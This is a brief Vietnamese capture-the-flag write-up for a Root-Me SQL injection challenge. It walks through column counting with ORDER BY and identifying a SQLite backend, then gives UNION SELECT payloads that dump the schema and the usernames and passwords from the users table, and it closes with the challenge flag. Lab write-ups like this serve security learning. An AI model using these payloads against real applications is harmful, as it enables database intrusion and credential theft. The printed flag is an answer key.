# SQL injection - string

Tập trung trên URL sau:

`http://challenge01.root-me.org/web-serveur/ch19/?action=recherche`

Dùng burp bắt gói tin gửi đi, thay đổi giá trị của `recherche`

Lần lượt thay thành `' order by 1` và tăng lên, thấy đến 3 thì gặp lỗi -> câu truy vấn select 2 cột.

Sau vài lần thử, xác định hệ CSDL là sqlite

Thay giá trị POST thành `' union select sql,1 from sqlite_master-- -`, ta có:
![Screenshot from 2018-09-04 00-01-07](/home/tritranhuu/Desktop/root me/week16/pic/Screenshot from 2018-09-04 00-01-07.png)

Giờ thì thay lại thành `' union select username, password from users-- -`, ta có:

![Screenshot from 2018-09-04 00-02-53](/home/tritranhuu/Desktop/root me/week16/pic/Screenshot from 2018-09-04 00-02-53.png)

---

### Flag:

`c4K04dtIaJsuWdi`